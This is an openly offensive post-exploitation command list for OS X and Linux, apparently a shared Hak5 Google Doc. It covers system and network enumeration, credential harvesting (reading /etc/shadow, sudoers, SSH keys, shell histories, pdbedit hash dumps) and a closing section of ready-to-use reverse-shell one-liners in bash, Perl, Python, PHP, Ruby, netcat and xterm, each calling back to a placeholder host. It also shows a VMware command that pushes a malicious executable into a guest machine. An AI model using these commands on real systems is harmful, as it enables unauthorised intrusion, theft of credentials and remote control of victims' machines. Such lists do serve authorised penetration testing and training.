OSX Post-Exploitation Command List

If for any reason you cannot access/edit these files in the future, please contact mubix@hak5.org

You can download these files in any format using Google Doc’s File->Download As method

If you are viewing this on anything other than Google Docs then you can get access to the latest links to
the the Linux/Unix/BSD, OSX, and Windows docs here: https://bitly.com/nuc0N0

DISCLAIMER: Anyone can edit these docs, and all that entails and infers

Table of Contents
OSX Post-Exploitation Command List
Table of Contents
Blind Files
SYSTEM
Networking
Configs
Packages
Finding Important Files
Files to pull
Remote System Access
Priv

Blind Files
(things to pull when all you can do is blindly read) LFI/dir traversal
● /etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)
●

SYSTEM
● uname -a
● sw_vers -productName
● sw_vers -productVersion
● system_profiler
OSX Post Exploitation Command List - Page: 1
 ● id
● printenv
● who
● ps aux
● ps ea
● /Library/Application Support/VMware Fusion/vmrun list
○ /Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest
windowsmalicious.exe WindowsVM
○ /Library/Application Support/VMware Fusion/vmrun captureScreen WindowsVM
● Snow Leopard and Lion
○ dscacheutil -q user
○ dscacheutil -q group
● Tiger
○ lookupd -q user
○ lookupd -q group

Networking
● ifconfig
● netstat -np tcp
● netstat -np udp

Configs
● ls -alh /private/etc/
● ls -alh /Library/Application Support/VMware Fusion/

Packages
● port installed
● ls -alh /Applications/

Finding Important Files

● ls -ma ~/
● ls -alh /Users/
● ls -alh /Users/*/.ssh/
● ls -alh /Users/*/.gnupg/
● ls -alh /Volumes/
●

OSX Post Exploitation Command List - Page: 2

Files to pull
●

Remote System Access

●

Priv
● cat /Library/Application Support/Objective Development/Little Snitch/rules.xpl
● ipfw list

The current Linux list:

(lets remove anything that doesn’t work (or doesn’t mean anything) on OS X)

# System
● uname -a
● ps aux
● ps -aef
● id
● arch
● w
● who -a
● gcc -v
● mysql --version
● perl -v
● ruby -v
● python --version
● df -k
● mount
● last -a

● lastlogin (*bsd)
● getenforce
● dmesg
● lspci
● lsusb
● lshw

OSX Post Exploitation Command List - Page: 3

 ● free -m
● du -h --max-depth=1 /
● which nmap (see if it’s already installed)
● locate bin/nmap
● which nc (see if it’s already installed)
● locate bin/<whatever you want>
● whoami
● jps -l
● java -version

# Networking
● hostname -f
● ip addr show
● ifconfig -a
● route -n
● cat /etc/network/interfaces
● iptables -L -n
● netstat -anop
● netstat -r
● netstat -nltupw (root with raw sockets)
● arp -a
● lsof -nPi

# Configs
● ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
● cat /etc/issue{,.net}
● cat /etc/passwd
● cat /etc/shadow (gotta try..)
● cat /etc/shadow~ # (sometimes there when edited with gedit)
● cat /etc/master.passwd
● cat /etc/group
● cat /etc/hosts
● cat /etc/crontab
● cat /etc/sysctl.conf
● for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
● cat /etc/resolv.conf
● cat /etc/samba/smb.conf
● pdbedit -L -w
● pdbedit -L -v
● cat /etc/exports
● cat /etc/auto.master
● cat /etc/auto_master
● cat /etc/fstab
● cat /etc/exports
● find /etc/sysconfig/ -type f -exec cat {} \;
● cat /etc/sudoers

OSX Post Exploitation Command List - Page: 4

#Package Sources
● cat /etc/apt/sources.list
● ls -l /etc/yum.repos.d/
● cat /etc/yum.conf

# Finding Important Files

● find /var/log -type f -exec ls -la {} \;
● ls -alhtr /mnt
● ls -alhtr /Volumes
● ls -alhtr /tmp
● ls -alhtr /home
● ls /Users/*/.ssh/*
● find /home -type f -iname '.*history'
● ls -lart /etc/rc.d/
● locate tar | grep [.]tar$
● locate tgz | grep [.]tgz$
● locate sql l grep [.]sql$
● locate settings | grep [.]php$
● locate config.inc | grep [.]php$
● ls /Users/*/id*
● locate .properties | grep [.]properties # java config files
● locate .xml | grep [.]xml # java/.net config files
● find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # find suids

# Per User
● ls -alh /Users/*/
● ls -alh /Users/*/.ssh/
● cat /Users/*/.ssh/authorized_keys
● cat /Users/*/.ssh/known_hosts
● cat /Users/*/.*hist*
● find -type f /Users/*/.vnc /Users/*/.subversion
● grep ^ssh /Users/*/.*hist*
● grep ^telnet `/Users/*/.*hist*
● grep ^mysql /Users/*/.*hist*
● cat /Users/*/.viminfo
● sudo -l # if sudoers is not readable, this sometimes works per user
● crontab -l

# Priv (sudo’d or as root)

● ls -alh /root/
● cat /etc/sudoers
● cat /etc/shadow
● cat /etc/master.passwd # OpenBSD
● cat /var/spool/cron/crontabs/*
● lsof -nPi

OSX Post Exploitation Command List - Page: 5

 ● ls /Users/*/.ssh/*

# Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
● bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # No /dev/tcp on Mac OS X
● perl -e 'use
Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")
);if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
● python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR
EAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
● php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
● ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d
2>&%d",f,f,f)'
1. nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
a. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
● xterm -display 10.0.0.1:1
○ Listener- Xnest :1
○ Add permission to connect- xhost +victimIP

OSX Post Exploitation Command List - Page: 6